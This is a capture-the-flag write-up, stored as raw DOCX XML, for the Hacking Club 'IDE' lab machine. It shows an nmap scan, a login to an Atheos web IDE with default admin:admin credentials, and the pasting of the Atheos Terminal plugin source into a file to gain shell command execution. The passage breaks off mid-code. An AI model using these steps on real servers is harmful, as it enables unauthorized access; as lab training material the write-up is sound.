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360" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.md5x29xlq8di" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:br w:type="page"/>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w1hcz8xjrvf5" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">About Hacking Club</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000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Hacking Club is a platform to learn cybersecurity, an incredible resource if you don’t know where to start. In addition to vulnerable machines, you have access to classes and challenges to practice your skills and access to an exclusive community to play and challenge yourself.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000006">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.6gjyyfwyiu02" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The best part about </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hacking Club</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is that it is very hands-on. If you are new to hacking, give it a try.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000007">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.le3alcaxdf4o" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000008">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This write-up refers to the </w:t>
      </w:r>
      <w:hyperlink r:id="rId7">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">IDE</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> machine. If you require support, please open a ticket in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId8">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">support channel on the Discord server</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000009">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="80" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.qdphub8skc63" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nmap Scan:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000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need to know which services are running in the background and which ports are open. So, we will use a tool called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap</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0B">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wfryfcaixx1u" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="5486400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="64"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5486400"/>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jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.p75ir7nkrnw4" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ports:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="24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22 - SSH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="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80 - HTTP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>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Port 111 - RPCBIND</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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Looking at the site:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000011">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340100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="61" name="image18.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image18.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1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Atheos is an updated and currently maintained fork of Codiad, a web-based IDE framework with a small footprint and minimal requirements. Atheos was completely rewritten from the original Codiad project to use more modern tools, cleaner code, and a broader feature set.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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viewing the page source code, we find the first flag.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000014">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3733800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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1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Returning to the login screen, we will try logging in using the default credentials → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin:admin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. And we successfully log in =)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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397500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="72" name="image19.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image19.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="53975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attempting to write some PHP reverse shells without success, I deduced that some PHP functions are disabled.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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After researching online, we found a plugin → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Terminal Emulator</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1A">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId13">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/HLSiira/Atheos-Terminal</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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This plugin allows interaction with the Unix terminal through the Atheos IDE.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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So, we will test it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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We will create a file → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">terminal.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and paste the following PHP code into it:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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2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Atheos Terminal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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2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Copyright (c) 2020 Liam Siira (liam@siira.io), distributed as-is and without</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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warranty under the MIT License. See [root]/license.md for more.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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https://github.com/HLSiira/Atheos-Terminal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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2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This information must remain intact.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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2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Copyright (c) 2013 Codiad &amp; Kent Safranski</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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Source: https://github.com/Fluidbyte/Codiad-Terminal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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2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require_once("../../common.php");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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2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Verify Session or Key</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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2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Common::checkSession();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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3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Globals</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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3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$project = SESSION("project");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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define("PASSWORD", "terminal");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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define("ROOT", Common::getWorkspacePath($project));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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define("BLOCKED", "ssh,telnet");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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3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Terminal Class</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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3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class Terminal {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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3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Constructor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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3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public function __construct() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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(!isset($_SESSION["activeDir"]) || !isset($_SESSION["activeDir"][$_SESSION["project"]]) ||</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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empty($_SESSION["activeDir"][$_SESSION["project"]])) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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(ROOT === "") {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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 = Common::execute("pwd");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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$_SESSION["activeDir"] = array([$_SESSION["project"]] =&gt; $output);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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else {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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$this-&gt;changeDir(ROOT);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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else {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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$this-&gt;changeDir($_SESSION["activeDir"][$_SESSION["project"]]);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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4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4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Primary call</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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4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public function process($str) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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$cmd = $this-&gt;parseCommand($str);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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 = Common::execute($cmd);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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$output;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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5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5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Parse command for special functions, blocks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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5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public function parseCommand($str) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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$command_parts = explode(" ", $str);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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Handle "cd" command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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(in_array("cd", $command_parts)) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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$cd_key = array_search("cd", $command_parts);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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$cd_key++;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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$dir = $command_parts[$cd_key];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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$this-&gt;changeDir($dir);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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Remove from command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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$str = str_replace("cd $dir", "", $str);</w:t>
      </w:r>
    </w:p>
